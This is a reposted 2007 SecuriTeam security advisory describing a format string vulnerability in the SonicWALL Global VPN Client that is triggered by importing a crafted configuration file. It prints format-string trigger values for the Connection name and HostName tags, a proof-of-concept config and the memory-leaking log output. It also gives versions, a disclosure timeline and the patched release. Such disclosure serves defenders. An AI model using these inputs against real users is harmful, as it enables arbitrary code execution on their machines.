- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SonicWALL Global VPN Client Format String Vulnerability
------------------------------------------------------------------------
SUMMARY
The SonicWALL Global VPN Client "provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway". SonicWALL
Global VPN Client suffers from a format string vulnerability that can be
triggered by supplying a specially crafted configuration file. This
vulnerability allows an attacker to execute arbitrary code in the context
of the vulnerable client. For a successful attack, the attacker would have
to entice his victim into importing the special configuration file.
DETAILS
Vulnerable Systems:
* SonicWall VPN client versions prior to 4.0.0.830
Immune Systems:
* SonicWall VPN client version 4.0.0.830
Format string errors occur when the client parses the "name" attribute of
the "Connection" tag and the content of the "Hostname" Tags in the
configuration file.
Examples:
<Connection name=%s%s%s%s>
<HostName>%s%s%s%s</HostName>
The bugs has been verified in version 3.1.556 and beta 4.0.0.810. With
version 3.1.556 the client has to initiate a connection to trigger the
vulnerability, whereas with version 4.0.0.810, the bug can be exploited by
simply double-clicking the configuration file. This can be attributed to
the 4.0 version trying to write the imported configuration to an extra
debug log.
Proof-of-concept:
In 4.0.0.810, the bug can be beautifully demonstrated by supplying a
crafted config file and then viewing the debug logfile. A configuration
like this...
<Connection name=> AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x
<HostName> BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x.%x.%x.%x.%x.%x
..yields the following logfile:
----------------------< Connection name
>-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been
enabled.' ''
----------------------</Connection name
>-----------------------------------
----------------------<HostName>--------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
----------------------</HostName>---------------------------------------
This vulnerability allows reading / writing to arbitrary memory addresses
within the process memory space. Exploitation is trivial under these
circumstances.
Vendor status:
Vendor notified: 2007-08-16
Vendor response: 2007-08-29
Patch available: 2007-11-26
ADDITIONAL INFORMATION
The information has been provided by <mailto:research@sec-consult.com>
Bernhard Mueller.
The original article can be found at:
<http://www.sec-consult.com/305.html> http://www.sec-consult.com/305.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
No comments:
Post a Comment